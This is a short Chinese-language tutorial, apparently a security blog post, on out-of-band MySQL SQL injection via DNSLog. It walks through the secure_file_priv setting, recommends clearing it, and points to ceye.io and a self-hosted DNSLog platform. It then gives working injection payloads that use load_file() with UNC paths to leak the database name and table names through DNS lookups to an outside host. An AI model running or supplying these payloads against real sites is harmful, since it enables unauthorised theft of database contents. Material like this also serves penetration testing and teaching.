mysql dnslog外带注入

注入时无回显时可尝试使用dnslog外带注入

 

mysql dnslog外带要用到load_file()函数的，需要当前数据库用户有读权限，并且需要设置secure_file_priv。

C:\phpStudy\PHPTutorial\MySQL\bin>mysql -uroot -p
Enter password: ****
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 138
Server version: 5.5.53 MySQL Community Server (GPL)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

 

1. secure_file_priv为null    表示不允许导入导出
2. secure_file_priv指定文件夹时，表示mysql的导入导出只能发生在指定的文件夹
3. secure_file_priv没有设置时，则表示没有任何限制

将secure_file_priv 设置为空，方便测试

mysql> show variables like '%secure%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_auth      | OFF   |
| secure_file_priv | NULL  |
+------------------+-------+
2 rows in set (0.02 sec)

mysql>

windows：修改my.ini 在[mysqld]内加入secure_file_priv =

linux：修改my.cnf 在[mysqld]内加入secure_file_priv =

 重启mysql，设置成功

dnslog平台搭建：https://github.com/BugScanTeam/DNSLog

在线平台：http://ceye.io/

这里用在线平台

 

 

payload:id=1' and (select load_file(concat('\\\\',(select database()),'.xxxxxx.ceye.io\\abc')))%23

查询表：
id=1' and (select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 1),'.xxxxx.ceye.io\\abc')))%23

id=1' and (select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 1,1),'.xxxxx.ceye.io\\abc')))%23